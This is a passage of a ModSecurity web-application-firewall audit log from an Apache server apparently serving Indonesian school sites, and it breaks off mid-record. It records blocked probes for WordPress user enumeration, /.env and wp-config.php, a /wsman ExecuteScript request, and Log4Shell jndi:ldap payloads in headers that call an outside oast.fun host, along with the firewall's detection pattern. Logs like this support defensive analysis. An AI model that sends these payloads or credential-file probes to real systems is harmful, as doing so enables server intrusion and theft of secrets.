[uri "%s"]%s Stopwatch: 1747836544107392 3144 (- - -) Stopwatch2: 1747836544107392 3144; combined=2166, p1=448, p2=1649, p3=20, p4=23, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --960af14e-Z-- --d25f2c67-A-- [21/May/2025:21:17:19 +0700] aC3gbyioYDAgD0WHUjQxNQAAAFY 103.236.140.4 43234 103.236.140.4 8181 --d25f2c67-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.241.80.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.241.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d25f2c67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d25f2c67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747837039704175 2550 (- - -) Stopwatch2: 1747837039704175 2550; combined=1177, p1=418, p2=733, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d25f2c67-Z-- --25d94542-A-- [21/May/2025:21:37:42 +0700] aC3lNiioYDAgD0WHUjQ3jQAAAEw 103.236.140.4 54170 103.236.140.4 8181 --25d94542-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.210.221.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.210.221.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --25d94542-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25d94542-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747838262228388 2580 (- - -) Stopwatch2: 1747838262228388 2580; combined=1337, p1=459, p2=849, p3=0, p4=0, p5=29, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25d94542-Z-- --a6bcab6c-A-- [21/May/2025:22:23:35 +0700] aC3v9yioYDAgD0WHUjQ_pAAAAEM 103.236.140.4 50920 103.236.140.4 8181 --a6bcab6c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --a6bcab6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6bcab6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747841015997322 930 (- - -) Stopwatch2: 1747841015997322 930; combined=347, p1=308, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6bcab6c-Z-- --70ddbb1b-A-- [21/May/2025:23:45:29 +0700] aC4DKSioYDAgD0WHUjRBhQAAAFU 103.236.140.4 33696 103.236.140.4 8181 --70ddbb1b-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 168506107 --70ddbb1b-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --70ddbb1b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --70ddbb1b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747845929246391 2633 (- - -) Stopwatch2: 1747845929246391 2633; combined=1800, p1=457, p2=1286, p3=17, p4=20, p5=20, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70ddbb1b-Z-- --b0f38835-A-- [22/May/2025:00:09:21 +0700] aC4IwXZGSt58M5vv3gkzpgAAAAQ 103.236.140.4 34608 103.236.140.4 8181 --b0f38835-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.23.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.23.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b0f38835-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0f38835-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747847361490218 2482 (- - -) Stopwatch2: 1747847361490218 2482; combined=1363, p1=435, p2=896, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0f38835-Z-- --a386ae3b-A-- [22/May/2025:00:24:56 +0700] aC4MaCioYDAgD0WHUjRCsQAAAEg 103.236.140.4 35448 103.236.140.4 8181 --a386ae3b-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; LGMS428) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --a386ae3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a386ae3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747848296381344 905 (- - -) Stopwatch2: 1747848296381344 905; combined=415, p1=376, p2=0, p3=0, p4=0, p5=39, sr=152, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a386ae3b-Z-- --2482d342-A-- [22/May/2025:00:29:19 +0700] aC4Nb4v3pT1iV0OxjLSDOQAAAJQ 103.236.140.4 36840 103.236.140.4 8181 --2482d342-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.80.250 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.80.250 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --2482d342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2482d342-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747848559379696 1152 (- - -) Stopwatch2: 1747848559379696 1152; combined=367, p1=322, p2=0, p3=0, p4=0, p5=45, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2482d342-Z-- --16366812-A-- [22/May/2025:00:29:19 +0700] aC4Nb4v3pT1iV0OxjLSDOgAAAJY 103.236.140.4 36842 103.236.140.4 8181 --16366812-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.80.250 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.80.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --16366812-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16366812-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747848559401577 683 (- - -) Stopwatch2: 1747848559401577 683; combined=260, p1=228, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16366812-Z-- --727f1045-A-- [22/May/2025:00:30:22 +0700] aC4Nrov3pT1iV0OxjLSDkAAAAII 103.236.140.4 37246 103.236.140.4 8181 --727f1045-B-- GET /?x=${jndi:ldap://${:-847}${:-283}.${hostName}.uri.d0mbkqa4kqtm561jt3n0zm9wt341cgq3j.oast.fun/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/107.0 Safari/537.36 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 168466871 --727f1045-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --727f1045-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747848622526697 5774 (- - -) Stopwatch2: 1747848622526697 5774; combined=3916, p1=445, p2=3436, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --727f1045-Z-- --2d2f0235-A-- [22/May/2025:00:30:26 +0700] aC4Nsov3pT1iV0OxjLSDmQAAAI0 103.236.140.4 37298 103.236.140.4 8181 --2d2f0235-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-847}${:-283}.${hostName}.referer.d0mbkqa4kqtm561jt3n0kkx9f1xz1g4ys.oast.fun} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-847}${:-283}.${hostName}.useragent.d0mbkqa4kqtm561jt3n0dinffo6f45mxw.oast.fun} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-847}${:-283}.${hostName}.accept.d0mbkqa4kqtm561jt3n08ewrb6qw3c4ra.oast.fun} Accept-Language: ${jndi:ldap://${:-847}${:-283}.${hostName}.acceptlanguage.d0mbkqa4kqtm561jt3n0ggecbbfq96mkz.oast.fun} Access-Control-Request-Headers: ${jndi:ldap://${:-847}${:-283}.${hostName}.accesscontrolrequestheaders.d0mbkqa4kqtm561jt3n0stzbypax9ufjo.oast.fun} Access-Control-Request-Method: ${jndi:ldap://${:-847}${:-283}.${hostName}.accesscontrolrequestmethod.d0mbkqa4kqtm561jt3n0tfzc8dcjo5otf.oast.fun} Authentication: Bearer ${jndi:ldap://${:-847}${:-283}.${hostName}.authenticationbearer.d0mbkqa4kqtm561jt3n04kskxdod68hfp.oast.fun} Location: ${jndi:ldap://${:-847}${:-283}.${hostName}.location.d0mbkqa4kqtm561jt3n0a6xp18c9x51wm.oast.fun} Origin: ${jndi:ldap://${:-847}${:-283}.${hostName}.origin.d0mbkqa4kqtm561jt3n039nxdxwop9r9c.oast.fun} Upgrade-Insecure-Requests: ${jndi:ldap://${:-847}${:-283}.${hostName}.upgradeinsecurerequests.d0mbkqa4kqtm561jt3n0qiu1efs44irha.oast.fun} X-Api-Version: ${jndi:ldap://${:-847}${:-283}.${hostName}.xapiversion.d0mbkqa4kqtm561jt3n0ekuz1pqxnw5sh.oast.fun} X-CSRF-Token: ${jndi:ldap://${:-847}${:-283}.${hostName}.xcsrftoken.d0mbkqa4kqtm561jt3n0hg5p5ztw5oqqr.oast.fun} X-Druid-Comment: ${jndi:ldap://${:-847}${:-283}.${hostName}.xdruidcomment.d0mbkqa4kqtm561jt3n0orhphpr1sarbb.oast.fun} X-Origin: ${jndi:ldap://${:-847}${:-283}.${hostName}.xorigin.d0mbkqa4kqtm561jt3n07gskaei8y11wq.oast.fun} Cookie: ${jndi:ldap://${:-847}${:-283}.${hostName}.cookiename.d0mbkqa4kqtm561jt3n0zkice4axfr35d.oast.fun}=${jndi:ldap://${:-847}${:-283}.${hostName}.cookievalue.d0mbkqa4kqtm561jt3n0krwbnn4g9djub.oast.fun} X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 168466895 --2d2f0235-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2d2f0235-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747848626131220 4634 (- - -) Stopwatch2: 1747848626131220 4634; combined=3537, p1=382, p2=3099, p3=0, p4=0, p5=56, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d2f0235-Z-- --cf6c0508-A-- [22/May/2025:00:32:32 +0700] aC4OMIv3pT1iV0OxjLSELQAAAJg 103.236.140.4 38232 103.236.140.4 8181 --cf6c0508-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.80.250 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 178.128.80.250 Accept-Encoding: gzip X-Varnish: 168467516 --cf6c0508-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cf6c0508-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747848752225722 622 (- - -) Stopwatch2: 1747848752225722 622; combined=280, p1=239, p2=0, p3=0, p4=0, p5=40, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf6c0508-Z-- --8312067f-A-- [22/May/2025:00:32:32 +0700] aC4OMIv3pT1iV0OxjLSELgAAAJU 103.236.140.4 38380 103.236.140.4 8181 --8312067f-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.80.250 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 178.128.80.250 Accept-Encoding: gzip X-Varnish: 168291665 --8312067f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8312067f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747848752260028 712 (- - -) Stopwatch2: 1747848752260028 712; combined=298, p1=250, p2=0, p3=0, p4=0, p5=48, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8312067f-Z-- --bacb5711-A-- [22/May/2025:00:36:39 +0700] aC4PJ3ZGSt58M5vv3gk2XwAAABI 103.236.140.4 40322 103.236.140.4 8181 --bacb5711-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Iceweasel/19.0.2 Accept-Charset: utf-8 --bacb5711-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bacb5711-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747848999180718 687 (- - -) Stopwatch2: 1747848999180718 687; combined=290, p1=255, p2=0, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bacb5711-Z-- --4dee507e-A-- [22/May/2025:00:52:50 +0700] aC4S8nZGSt58M5vv3gk3ogAAAAA 103.236.140.4 43738 103.236.140.4 8181 --4dee507e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 128.199.254.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 128.199.254.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4dee507e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dee507e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747849970366966 2920 (- - -) Stopwatch2: 1747849970366966 2920; combined=1328, p1=458, p2=839, p3=0, p4=0, p5=31, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dee507e-Z-- --0981201f-A-- [22/May/2025:00:57:35 +0700] aC4UD3ZGSt58M5vv3gk3rQAAAAs 103.236.140.4 44186 103.236.140.4 8181 --0981201f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.245.206.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.245.206.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0981201f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0981201f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747850255444066 2870 (- - -) Stopwatch2: 1747850255444066 2870; combined=1401, p1=546, p2=826, p3=0, p4=0, p5=29, sr=154, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0981201f-Z-- --deabdc24-A-- [22/May/2025:01:08:27 +0700] aC4Wm4v3pT1iV0OxjLSGXAAAAIk 103.236.140.4 44990 103.236.140.4 8181 --deabdc24-B-- GET /wp-json/wp/v2/users/ 